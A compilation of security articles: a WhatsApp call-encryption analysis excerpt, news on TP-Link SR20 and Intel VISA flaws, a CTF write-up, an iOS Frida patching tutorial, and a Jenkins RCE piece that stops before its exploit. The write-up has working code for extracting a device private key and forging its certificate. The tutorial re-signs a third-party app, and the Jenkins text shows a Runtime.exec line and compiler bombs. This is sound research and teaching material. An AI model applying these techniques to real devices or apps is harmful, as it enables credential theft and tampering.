  • The Noise Pipes Protocol, the Signal Protocol and XMPP interact for transporting the master secret to the callee for setting up a call session. The master secret is encrypted with the Signal Protocol, then packed into an XMPP message, which is encrypted with the Noise Pipes Protocol, and sent to a WhatsApp server. After that, the server passes the encrypted master secret to the callee for signaling an incoming call.
  • Integrity protection of VoIP calls seems to have flaws. This is because some SRTP streams are not checked for integrity. Moreover, there are streams which compute invalid authentication tags with zero bytes as input, instead of the actual SRTP packet.
  • SRTP packets do not reveal sensitive data, except the duration of a VoIP call session.
  • A malicious caller is able to manipulate the initial call message. This enables an attacker to confuse WhatsApp clients, so that the callee sees unintended caller information on his device. Social engineering attacks can be realized because of this vulnerability.
  • For cryptographers:
  • The binaries: and

The conducted research faces several limitations. There are four streams, which are initialized with encryption keys from an unknown origin. Adding to this, I do not know where the keys for integrity protection of the SRTP streams come from.

To conclude, this article showed that it can be difficult for application developers to hide the implementation of mobile applications. Tools like Frida enable researchers and attackers to gather critical information about the implementation of mobile applications in a short amount of time. Application developers should bear in mind that cryptographic keys can easily be extracted with such tools. For impeding the dynamic analysis of an application, it is useful to strip symbol names from application binaries. Moreover, application developers should remove string constants, which contain critical application information or help to locate functions.


TP-Link ‘smart’ router proves to be anything but smart – just like its maker: Zero-day vuln dropped after silence

Original text by Thomas Claburn

TP-Link’s all-in-one SR20 Smart Home Router allows arbitrary command execution from a local network connection, according to a Google security researcher.

On Wednesday, 90 days after he informed TP-Link of the issue and received no response, Matthew Garrett, a well-known Google security engineer and open-source contributor, disclosed a proof-of-concept exploit to demonstrate a vulnerability affecting TP-Link’s router.

The 38-line script shows that you can execute any command you choose on the device with root privileges, without authentication. The SR20 was announced in 2016.

Via Twitter, Garrett explained that TP-Link hardware often incorporates TDDP, the TP-Link Device Debug Protocol, which has had multiple vulnerabilities in the past. Among them, version 1 did not require a password.

«The SR20 still exposes some version 1 commands, one of which (command 0x1f, request 0x01) appears to be for some sort of configuration validation,» he said. «You send it a filename, a semicolon and then an argument.»

Once it receives the command, says Garrett, the router responds to the requesting machine via TFTP, asks for the filename, imports it to a Lua interpreter, running as root, and sends the argument to the config_test() function within the imported file.

The Lua os.execute() method passes a command to be executed by an operating system shell. And since the interpreter is running as root, Garret explains, you have arbitrary command execution.

However, while TDDP listens on all interfaces, the default firewall prevents network access, says Garrett. This makes the issue less of a concern that remote code execution flaws identified in TP-Link 1GbE VPN routers in November.

Even so, vulnerability to a local attack could be exploited if an attacker manages to get a malicious download onto a machine connected to an SR20 router.

TP-Link did not immediately respond to a request for comment.

Garrett concluded his disclosure by urging TP-Link to provide a way to report security flaws and not to ship debug daemons on production firmware.

Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included with Platform Controller Hub (PCH) chipsets part of modern Intel CPUs and works like a full-fledged logic signal analyzer.

Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH —and later the main CPU.


Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.


Goryachy and Ermolov said their technique doesn’t require hardware modifications to a computer’s motherboard and no specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086security advisory to take control of the Intel Management Engine and enable VISA that way.

«The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,» an Intel spokesperson told ZDNet yesterday.

«Customers who have applied those mitigations are protected from known vectors,» the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers will publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. Chances that VISA will be abused are low. This is because if someone would go through the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, then they’ll likely use that component to carry out their attacks, rather than rely on VISA.

As a side note, this is the second «manufacturing mode» feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in «manufacturing mode.»

Insomni’Hack 2019 CTF – Perfectly Unbreakable Flag – 500

Original text by Phil

Challenge description

To our surprise, we found out that our challenge from last year has been counterfeited by another CTF.
Since we must protect our flag business as much as we can, we invested in the most secure technology around : the cloud™®©.
Since each device is uniquely fingerprinted, we are confident that our unclonable devices will be safe from those french knockoffs.

More info :
- If the board fails to connect to the cloud, perform a hard reset (ie. disconnect it completely before rebooting it)
- The cloud endpoint used to get the flag is /flag, in case you need to guess it

And a .tgz is given, containing the 3 firmwares of the 3 available boards:

$ ls -l
total 1376
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-2.bin
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-3.bin
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-4.bin
-rwxrwxrwx 1 root root 545222 mars 22 18:17 firmwares-d1bd1fcbfb1fdef7678608460ed96b16074aae3f43ed052ebcc3e2724d7efc27.tgz
$ sha256sum board-*
aadc9e62ba75bda60b1412d0514bae00a28f51636c1291590e70c217bcf25a2f board-2.bin
27e7b7d39566bbdbd109a56e50f546681770ef3fad261118d64e1319ff0d53e7 board-3.bin
32682457545043f8611078d43549cf4414f9f0bd29700c1f2c42ad80d5013229 board-4.bin

Understanding what to do

As this challenge looks not trivial at all, I’ve spent 15 minutes on understanding the goal and the path to achieve the job. All the 3 boards are in free access on a desk beside the organisation team.

Picture of the board number 2

When you power-up the device using the black USB cable, it start running and show the activity on the network connector. As this device is a development board, the left secable part is a ST-Link V2 ready to handle the right part of the board, composed of the main MCU and a few components. Connecting a PC to the USB port and running it with the official ST-Link utility give you this trace:

19:53:18 : ST-LINK SN : 0669FF494849887767175629
19:53:18 : ST-LINK Firmware version : V2J29M18
19:53:18 : Connected via SWD.
19:53:18 : SWD Frequency = 4,0 MHz.
19:53:18 : Connection mode : Connect Under Reset.
19:53:18 : Debug in Low Power mode enabled.
19:53:18 : Device ID:0x419
19:53:18 : Device family :STM32F42xxx/F43xxx
19:53:18 : Can not read memory!
Disable Read Out Protection and retry.

The MCU is protected, but the ST-link is non altered and can be used.

Now let’s see if the virtual COM port (VCP) is mapped by the ST-Link for debug purpose. Just start a terminal and RESET the board to have a look at the boot sequence:

Starting mbed-os-example-tls/tls-client
Using Mbed OS 5.11.5
Successfully connected to perfectlyunbreakable-cloud.insomni.hack at port 443
Starting the TLS handshake…
Successfully completed the TLS handshake
Server certificate:
cert. version : 1
serial number : 29:98:FB:FA:5B:65:0A:2D:15:E0:A4:BF:9B:06:6C:0B:1D:72:C8:8A
issuer name : C=CH, ST=Geneva, O=Insomni'hack
subject name : C=CH, ST=Geneva, O=Insomni'hack, CN=perfectlyunbreakable-cloud.insomni.hack
issued on : 2019-03-14 11:00:24
expires on : 2020-07-26 11:00:24
signed using : ECDSA with SHA256
EC key size : 256 bits

Certificate verification passed
Established TLS connection to perfectlyunbreakable-cloud.insomni.hack
HTTP: Received 175 chars from server
HTTP: Received '200 OK' status … OK
HTTP: Received message:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Mar 2019 18:11:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 20
Connection: keep-alive

Cloud connection OK.


At this point, nothing other is possible over the serial port, impossible to send command to the board.

The next check is to try to connect with a regular PC from LAN of the CTF to the URL https://perfectlyunbreakable-cloud.insomni.hack/ and see what happened:

No way to connect to the « secure cloud »

To summarize: The goal is to connect to the https://perfectlyunbreakable-cloud.insomni.hack/flag URL. I can deduce that only the official boards can do it because they own a client side certificate in their flash. So, the only way to connect to /flag with a regular browser is to steal the private certificate key from the flash of the MCU and import it to the browser.

Let’s start the reverse

Check the difference between all the 3 firmwares

As the authors gives you the 3 binary firmwares from the 3 running board, this looks too simple to spot the certificate by this way, but let’s try it.

The client side public certificate change …
… and a few bytes too

The public certificate is the first difference, and the 32 bytes at offset 0x080437B0 is the second one. The second one is the most interesting because it should be the —–BEGIN PRIVATE KEY—– but it was not the case.

Let’s the long reverse start

Now it’s time to reverse the 281KB STM32 firmware file… And guess what, just to be sure to maximise the complexity of the task, let’s use a newcomer: Ghidra!

The tool worth a look and from my previous tests, the ARM-thumb decompiler was fine on all the examples I’ve tried.


Loading the firmware and giving at this first stage the correct description to Ghidra is mandatory. The STM32 used for the challenge is a STM32F42xxx/F43xxx (according to the previous ST-Link trace). Checking in the reference guide for the ARM level instruction will point you Cortex-M4. And if you dig more, you’ll find it’s an ARMv7E ISA. The mistake I’ve done is to select in Ghidra the ARM v7 little endian target. The correct one is Cortex (thanks Balda for the correction):

Set the correct target

And do not forget to set the base address of the firmware:

0x08000000 came from reference guide


Now we need to find the public and private key in the firmware. For the pub cert chain, it’s trivial, just need to look for strings « BEGIN CERTIFICATE »:



But now the complex things start: where the f*ck is the private key… At this point you have no choice to understand how the HTTPS connection is done to the server. The first and winning idea is to take back the serial log and try to identify the SDK used. At the beginning « Mbed OS 5.11.5 » explicitly give you the answer. Then, you need to dig more for guessing how the TLS is done.

The interesting part is :

Starting the TLS handshake…
Successfully completed the TLS handshake

After a few minutes digging with Google, this PAGE give you nearly the same trace I’ve obtain through the serial interface. From this sample code found in the SDK, you can find your way in the firmware:

SDK: allocating the object « HelloHttpsClient »
Decompiled version

As I’ve never pay attention on how to reverse some C++ code in an embedded target, I was stuck by the pointer added to a method without parameter in the original source code. Ghidra is doing a good job, but you need to understand that the pointer renamed here « complexStruct » is the pointer to the current memory segment of the instance of the object.

Then, digging more in the TLS part is needed. According to the SDK, using a client private certificate measn you need to call the function « mbedtls_ssl_conf_own_cert ». By searching in the strings I found « mbedtls_ssl_conf_own_cert() returned -0x%04X » and a XREF. This code is setting up the certificate pub/priv key pair:

Generation and setup of the private key

Now, it’s time to study the function genPrivateKey() and see how it works:

Computing the private key

The funniest part of the challenge is here. This code is nothing more than a bitwise AND with 2 offset in memory. One in flash, OK, but the other one in a non initialized SRAM zone! Now it’s time to have a look at the hint given during the CTF:

Fri Mar 22 2019, 22:20:22 [Perfectly Unbreakable Flag Hint]
The title acronym means something else in the hardware community!

« PUF » acronym. What? Google point THIS page. My friend dok tells me, « I know what it is, it’s something you can’t clone because it use some physical unpredictable parameter ». But in the current case the PUF function is the SRAM at boot. 64 bytes are used as the private key. But, as there is some flipping bits in those 64 bytes during the powerup sequence, another 64 bytes table is used as mask for keeping only the stables states bits, and remove the flipping one. This tech needs to boot a huge number of time the board to monitor the states of the 8×64 bits and only keep the stable one. That’s a REALLY GOOD TRIX!


Now I need to dump the content of the SRAM3, forgotten during the first dump  . It’s quite easy, even with the protection fuse set. You just need to connect your PC, run the ST-Link utility and press « connect », then on the target hit RESET and at the very first moment of the boot you can dump the whole SRAM zone. Even if the debug port is closed.

With the memory dump and the flash dump, here is the code who compute and display the private key:

import base64
sram = "\x09\xE6\xF1\x20\x32\xE2\x38\xDD\xCF\x29\x27\x7F\x6F\xEB\x76\x34\x40\xC4\x44\xDC\xCA\xCD\x3B\x87\x0B\xAB\xE1\xB8\xE8\x80\x7B\x9B\x3B\xAA\xD5\x04\x61\xCA\xA2\x91\x66\x32\x49\xDF\xE5\x42\x98\xF5\x98\xB2\x37\x7E\x7E\xEB\xFD\x2E\xAB\xC1\x9F\x5A\xC0\xE3\xFF\xD9"
flash = "\x59\x3D\x32\xFE\x47\xA5\x4A\x85\x88\x35\x4E\x27\x63\x49\x37\xB6\xFF\x1B\xBE\xC2\xCE\x63\x95\xAB\x30\x3F\x77\x9D\x59\xD3\xE2\x75\xDD\xFF\x1E\x03\x2E\xF1\xEE\xE1\x52\xE8\xAA\x8B\x0E\x9D\xFA\xEA\x4E\x3D\x79\x0C\xD7\xEB\xBD\x7E\x73\x35\x9E\x5B\xBE\x5D\x42\xD7"
res = []
for x in range(len(sram)) :
res.append( ord(sram[x]) & ord(flash[x]) )
print("Private key = ",res)

Private key = [9, 36, 48, 32, 2, 160, 8, 133, 136, 33, 6, 39, 99, 73, 54, 52, 64, 0, 4, 192, 202, 65, 17, 131, 0, 43, 97, 152, 72, 128, 98, 17, 25, 170, 20, 0, 32, 192, 162, 129, 66, 32, 8, 139, 4, 0, 152, 224, 8, 48, 49, 12, 86, 235, 189, 46, 35, 1, 158, 90, 128, 65, 66, 209]

At this point it was 3H56. My first think was « shit, it miss me 10 minutes to generate the private key and solve the challenge ».


As it’s always a big deception to not finish a challenge in time, I continue at home to solve it. But I was wrong. It was far more complex to finish the reverse until the flag, and the 10 minutes changed to another 4 hours of job.

After obtaining the bits from SRAM who doesn’t flip, you need to reverse this:

Unknown hash function

And the funny stuff is for example:

no way to understand what’s running here…

This one doesn’t decompile, and the ASM view is not so clear. My guess is this an interrupt hook to an external crypto-engine who run in a few cycles a cryptographic function.

To help identifying the function, I’ve download an official TLS library from Mbed: mbedtls-2.16.0-apache.tgz. With this reference source code, the unknown function can be commented and is a little bit more readable:

a clean SHA256 code

If you think it’s trivial now, your right but with the solution on the eyes it’s more easy, believe me  . So the unknown part of the private key become:

import base64
import hashlib
from array import array

sram = "\x09\xE6\xF1\x20\x32\xE2\x38\xDD\xCF\x29\x27\x7F\x6F\xEB\x76\x34\x40\xC4\x44\xDC\xCA\xCD\x3B\x87\x0B\xAB\xE1\xB8\xE8\x80\x7B\x9B\x3B\xAA\xD5\x04\x61\xCA\xA2\x91\x66\x32\x49\xDF\xE5\x42\x98\xF5\x98\xB2\x37\x7E\x7E\xEB\xFD\x2E\xAB\xC1\x9F\x5A\xC0\xE3\xFF\xD9"
flash = "\x59\x3D\x32\xFE\x47\xA5\x4A\x85\x88\x35\x4E\x27\x63\x49\x37\xB6\xFF\x1B\xBE\xC2\xCE\x63\x95\xAB\x30\x3F\x77\x9D\x59\xD3\xE2\x75\xDD\xFF\x1E\x03\x2E\xF1\xEE\xE1\x52\xE8\xAA\x8B\x0E\x9D\xFA\xEA\x4E\x3D\x79\x0C\xD7\xEB\xBD\x7E\x73\x35\x9E\x5B\xBE\x5D\x42\xD7"

res = []

for x in range(len(sram)) :
res.append( chr(ord(sram[x]) & ord(flash[x])) )
res = array('B', map(ord,res)).tostring()

print("Private key = ",res)
print("sha256 = " , hashlib.sha256(res).hexdigest())

$ python
Private key = b"\t$0 \x02\xa0\x08\x85\x88!\x06'cI64@\x00\x04\xc0\xcaA\x11\x83\x00+a\x98H\x80b\x11\x19\xaa\x14\x00 \xc0\xa2\x81B \x08\x8b\x04\x00\x98\xe0\x0801\x0cV\xeb\xbd.#\x01\x9eZ\x80AB\xd1"
sha256 = 8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382

Fake the board and grab the flag

Now it’s time to start a little bit of crypto. EDIT: no, not a little! I have something looking like the private key and the full chain of certificate. I need to craft a correct certificate, so I can deploy it and visit the /flag URL. If you wonder how I can do that after the CTF you’re right: I have asked to the creators of the challenge the Docker files to run it here and finish the work.

First, craft the private key. For this one you need to generate the ECC correct private + public key file in .pem format. I never found a regular way working because of a lack of knowledge in certificate / keys manipulation. Thanks to Sylvain for correct my silly Python code. The use an enhanced Python crypto lib is needed, I’ve used Pycryptodome.

$ pip install pycryptodome

$ cat
from Crypto.PublicKey import ECC

e=ECC.construct(curve="prime256v1", d=0x8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382)

print e.export_key(format="PEM")

$ python2 > privateKey.pem
$ cat privateKey.pem

Now you need to concatenate the 2 public certificates found in the flash of the board in a file called « chain.pem ». And finally generate a single file with all the stuff to import it on a regular browser:

$ openssl pkcs12 -inkey privateKey.pem -in chain.pem -export -out personnal.pfx

$ openssl pkcs12 -info -in personnal.pfx
Enter Import Password:
MAC: sha1, Iteration 2048
MAC length: 20, salt length: 8
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 2048
Certificate bag
Bag Attributes
localKeyID: 95 5D 33 B2 38 0B 4C CE FC 46 DD 1C 55 17 63 45 5A 7A 17 82
subject=C = CH, ST = Geneva, O = Insomni'hack, CN = board-2.insomni.hack
issuer=C = CH, ST = Geneva, O = Insomni'hack
Certificate bag
Bag Attributes:
subject=C = CH, ST = Geneva, O = Insomni'hack
issuer=C = CH, ST = Geneva, O = Insomni'hack
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2048
Bag Attributes
localKeyID: 95 5D 33 B2 38 0B 4C CE FC 46 DD 1C 55 17 63 45 5A 7A 17 82
Key Attributes:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

One fuckin’ thing to know: if you don’t set a password to your .pfx file, Firefox will fail silently to import it.

Another funny thing: at this point you don’t know if there is more computing on the 32 bytes used for generate the private key. The firmware is so huge, you can’t check all functions between the last key manipulation and the TCP_connect to the HTTPS port. You just need to try and pray…

Now you just need to connect to the super-secure cloud with the fake credz:

The extracted certificate roxx !!!

And now you just need to grab the flag:

The flag, hum

No, not exactly the flag …

Finish him


I was wondering the needs to this last step, who’ve made lost the flag to Marius (@nSinusR) from Tasteless (@TeamTasteless). Yes, Marius arrived during the CTF at this point at 3h55. It’s the difference between skilled teams and amateurs  . As we have access to the boards, we have the firmware, it would have been possible to patch the board to connect directly to the url https://perfectlyunbreakable-cloud.insomni.hack/flag instead of https://perfectlyunbreakable-cloud.insomni.hackduring the boot sequence. So the last step involve the private key you’ve used for generate the certificate as a proof of work. To remove the AES-CBC I’ve used Openssl:

$ hexdump -C flag.enc 
00000000 0f b8 b7 c7 53 8e 1e 20 93 ea 93 13 e3 08 9f 46 |….S.. …….F|
00000010 1e cb 13 8e 42 28 d0 46 52 39 27 28 09 15 2a cf |….B(.FR9'(..*.|
$ openssl enc -aes-256-cbc -d -in flag.enc -K '8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382' -iv ' 00000000000000000000000000000000'


I personally go to Insomni’Hack CTF for one thing: the hardware challenges. This year 2 challenges were here for our pleasure. The first one from @_noskill of , intern at SCRT at the moment, were cool and a good warm-up (write-up from Sylvain of DUKS HERE). And this « monster » from Balda & Sylvain.

I must say this challenge occupy me during the whole CTF. I’ve learn a tech’ I’ve never seen before, the PUF concept is really funny and, I guess, used IRL. Solving a task close to a real project is far away more exiting, and it was the case here! Using Ghidra was a good experience, I’ll do it again and hope to forget ASAP IDA-PRO to focus only on this wonderful open-source tool.


A little regret on this one is the missing in the description of the « crypto » categorie. With this more accurate description I would not tried it alone, and I would asked for some helps to other members of the team at the very first moment of the CTF. And the complexity was too much for a 10 hours CTF, so the task wasn’t solved at 4h00 by anyone. To be honest, without the help of the conceptors, I’ll not be able to solve it, even afterwards (I guess I would ragequit() before the flag  ).

The troll


From the description: « To our surprise, we found out that our challenge from last year has been counterfeited by another CTF. » is well sent  . Last year I solved in 3 minutes the hardware challenge, because the flash read protection fuse on the STM32 was forgotten (write-up HERE). In November 2018 Balda got a kind word at GreHack CTF on the first hardware challenge :

"An Insomni'Hack 2018 tribute":
Was a 400 points at Insomni'hack and is only a 50 points at GreHack ... with the good tools ( Hello Baldanos  )

This year you win, so 1 – 1. See you the 15th of November for the next edition of GreHack  .

Credits & Greetings

Nice challenge by Baldanos (@Baldanos) and Sylvain (@Pelissier_S). Thanks for your time and the technical trix on Ghidra during the CTF. Big up guyz!


Thanks to Azox (@8008135_) for help me at … 3H25! Pretty sure that together we would solve it in time, bourricot  !

Thanks to Marius (@nSinusR) from Tasteless (@TeamTasteless) for review & suggestions on this write-up.


And also thanks to the SCRT team, especially Michael (@0xGrimmlin) for making things possible  . See you next year!

Write-up by Phil (@PagetPhil) 27/03/2019

Setting up Frida Without Jailbreak on devices running Latest iOS 12.1.4

Original text by Dinesh Shetty

Majority of the times during a penetration test or bug-bounty engagement, you might encounter customers who limit the scope of testing to non-jailbroken devices running the latest mobile OS. How do you dynamically instrument the application in those cases? How do you trace the various functionalities in the application while trying to attack the actual application logic?

Frida ( is a runtime instrumentation toolkit for developers, reverse-engineers, and security researchers that allows you to inject your own script into the blackbox mobile application. Normally Frida is always installed and run on Jailbroken devices. That process is pretty straight-forward. However, the complexity increases when you want to run it on non-jailbroken devices. In this article I’ll explain in detail the steps to be followed to get Frida running on the latest non-jailbroken version of iOS viz iOS 12.1.4.

The only requirement at this stage is an unencrypted IPA file. This is normally provided by the customer. If not, we can download the IPA file from the AppStore and then use tools like Clutch( or bfinject( to decrypt it. Alternatively unencrypted versions of the IPA files are also available on Ensure that you do a checksum check and verify it with the custom before you start testing. Don’t be shocked if you find that the IPA files from the website have been modified to include un-intended code. In our case, lets target the Uber application from the AppStore.

The various steps for setting up Frida to run on non-jailbroken iOS device are:

1) Setting up the Signing Identity

2) Setting up Mobile Provision File

3) Performing the Actual Patching

4) Fixing Codesign issues

5) Performing the required Frida-Fu

I will take you through each of these steps one-by-one.

Setting up the Signing Identity

a) Launch Xcode and navigate to the Accounts section using the Preferences menu item. Make sure you are logged in to Xcode using your Apple account.

b) Select “Agent” and Click Manage Certificates.

c) Click + and select “iOS Development”.

d) To verify that the identity is properly set up, you can use the following command:

security find-identity -p codesigning -v

This command will output all the signing identities for your account.

Setting up Mobile Provision File

a) Next step will be to create a new Xcode project with team as agent and target as your actual test device and click play. Run the application on the device. You have to do this step for every new device that you want to use for testing.

b) Right click the generated .app file and select “Show in Finder”.

c) Right click the .app file from the Finder and select “Show Contents”.

d) Save the embedded.mobileprovision file. You will need this later while signing the IPA file.

Performing the Actual Patching

a) Download the latest version of Frida. This can be done using the following command:

curl -O

b) Unzip the IPA file and copy this Frida library into the folder named “Frameworks”. If the folder “Frameworks” does not exist, create it.

unzip Uber.ipa
cp FridaGadget.dylib Payload/

c) Now, we will use the tool insert_dylib by Tyilo to inject the Frida dylib into the Uber Mach-O binary executable

Use the following steps to build the insert_dylib tool.

git clone
cd insert_dylib

d) The executable can now be found at “build” folder. Copy the generated insert_dylib executable to your system path using the following command:

cp insert_dylib/build/Release/insert_dylib /usr/local/bin/insert_dylib

e) Use the following command to inject the Frida dylib into your Uber Mach-O binary executable

insert_dylib --strip-codesig --inplace '@executable_path/Frameworks/FridaGadget.dylib' Payload/

If we try to install the application now, it will fail because of code sign issues. We need to fix it before we proceed.

Fixing Codesign issues

a) Sign the Frida dylib using codesign. This can be done using the following command.

codesign -f -v -s  5E25E<snipped-signing-identity> Payload/

b) Zip the Payload folder into an IPA file using the following command:

zip -qry patchedapp.ipa Payload

c) Install `applesign` utility using the following command:

npm install -g applesign

d) Now, sign the patched IPA file that we created previously.

applesign -i 5E25E<snipped-signing-identity> -m embedded.mobileprovision -o patched_codesign.ipa patchedapp.ipa

e) Install ios-deploy and then push the patched_codesign IPA file to the device.

npm install -g ios-deploy
mkdir final_file
cp patched_codesign.ipa final_file
cd final_file
unzip patched_codesign.ipa
ios-deploy --bundle Payload/*.app --debug -W

Observe that the console message indicates that Frida is now running on port 27042.


Your iOS device will appear to be frozen till you enter the Frida commands. To confirm if Frida gadget is actually working make use of the following command:

frida-ps -Uai

Connect to the Gadget using:

frida -U Gadget

Trace Crypto calls using:

frida-trace -U -i "*Crypto*" Gadget

The following shows the sample usage of Frida scripts

frida -U -l list-classes.js Gadget

That is all I have for this article. In later articles we will talk about how to use Frida to perform a variety of attacks on Mobile Applications.

Hacking Jenkins Part 2 — Abusing Meta Programming for Unauthenticated RCE!

Original text by orange

Hello everyone!

This is the Hacking Jenkins series part two! For those people who still have not read the part one yet, you can check following link to get some basis and see how vulnerable Jenkins’ dynamic routing is!

As the previous article said, in order to utilize the vulnerability, we want to find a code execution can be chained with the ACL bypass vulnerability to a well-deserved pre-auth remote code execution! But, I failed. Due to the feature of dynamic routing, Jenkins checks the permission again before most dangerous invocations(Such as the Script Console)! Although we could bypass the first ACL, we still can’t do much things 🙁

After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing notes, I found another exploitation way on a gadget that I failed to exploit before! Therefore, the part two is the story for that! This is also one of my favorite exploits and is really worth reading 🙂

Vulnerability Analysis

First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally the reason why people choose Jenkins is that Jenkins provides a powerful Pipeline feature, which makes writing scripts for software building, testing and delivering easier! You can imagine Pipeline is just a powerful language to manipulate the Jenkins(In fact, Pipeline is a DSL built with Groovy)

In order to check whether the syntax of user-supplied scripts is correct or not, Jenkins provides an interface for developers! Just think about if you are the developer, how will you implement this syntax-error-checking function? You can just write an AST(Abstract Syntax Tree) parser by yourself, but it’s too tough. So the easiest way is to reuse existing function and library!

As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can deal with the Pipeline script without errors, the syntax must be correct! The code fragments here shows how Jenkins validates the Pipeline:

public JSON doCheckScriptCompile(@QueryParameter String value) {
    try {
        CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build();
        new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value);
    } catch (CompilationFailedException x) {
        return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray());
    return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON();
    // Approval requirements are managed by regular stapler form validation (via doCheckScript)

Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just an AST parsing. Without running execute() method, any dangerous invocation won’t be executed! If you try to parse the following Groovy script, you get nothing 🙁

print java.lang.Runtime.getRuntime().exec("id")

From the view of developers, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation so the permission check here is more less than usual! Without any execute() method, it’s just an AST parser and must be safe! This is what I thought when the first time I saw this validation. However, while I was writing the technique blog, Meta-Programming flashed into my mind!

What is Meta-Programming

Meta-Programming is a kind of programming concept! The idea of Meta-Programming is providing an abstract layer for programmers to consider the program in a different way, and makes the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both processing the program by itself and writing programs that operate on other programs(compiler, interpreter or preprocessor…) are Meta-Programming! The philosophy here is very profound and could even be a big subject on Programming Language!

If it is still hard to understand, you can just regard eval(...) as another Meta-Programming, which lets you operate the program on the fly. Although it’s a little bit inaccurate, it’s still a good metaphor for understanding! In software engineering, there are also lots of techniques related to Meta-Programming. For example:

  • C Macro
  • C++ Template
  • Java Annotation
  • Ruby (Ruby is a Meta-Programming friendly language, even there are books for that)
  • DSL(Domain Specific Languages, such as Sinatra and Gradle)

When we are talking about Meta-Programming, we classify it into (1)compile-time and (2)run-time Meta-Programming according to the scope. Today, we focus on the compile-time Meta-Programming!

P.S. It’s hard to explain Meta-Programming in non-native language. If you are interested, here are some materials! WikiRef1Ref2
P.S. I am not a programming language master, if there is anything incorrect or inaccurate, please forgive me <(_ _)>

How to Exploit?

From the previous section we know Jenkins validates Pipeline by parseClass(…) and learn that Meta-Programming can poke the parser during compile-time! Compiling(or parsing) is a hard work with lots of tough things and hidden features. So, the idea is, is there any side effect we can leverage?

There are many simple cases which have proved Meta-Programming can make the program vulnerable, such as he macro expansion in C language:

#define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
#define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a
#define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b
#define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c
#define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d
#define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e
__int128 x[]={f,f,f,f,f,f,f,f};

or the compiler resource bomb(make a 16GB ELF by just 18 bytes):

int main[-1u]={1};

or calculating the Fibonacci number by compiler

template<int n>
struct fib {
    static const int value = fib<n-1>::value + fib<n-2>::value;
template<> struct fib<0> { static const int value = 0; };
template<> struct fib<1> { static const int value = 1; };

int main() {
    int a = fib<10>::value; // 55
    int b = fib<20>::value; // 6765
    int c = fib<40>::value; // 102334155

From the assembly language of compiled binary, we can make sure the result is calculated at compile-time, not run-time!

$ g++ template.cpp -o template
$ objdump -M intel -d template
00000000000005fa <main>:
 5fa:   55                      push   rbp
 5fb:   48 89 e5                mov    rbp,rsp
 5fe:   c7 45 f4 37 00 00 00    mov    DWORD PTR [rbp-0xc],0x37
 605:   c7 45 f8 6d 1a 00 00    mov    DWORD PTR [rbp-0x8],0x1a6d
 60c:   c7 45 fc cb 7e 19 06    mov    DWORD PTR [rbp-0x4],0x6197ecb
 613:   b8 00 00 00 00          mov    eax,0x0
 618:   5d                      pop    rbp
 619:   c3                      ret
 61a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]

For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow!

First Attempt

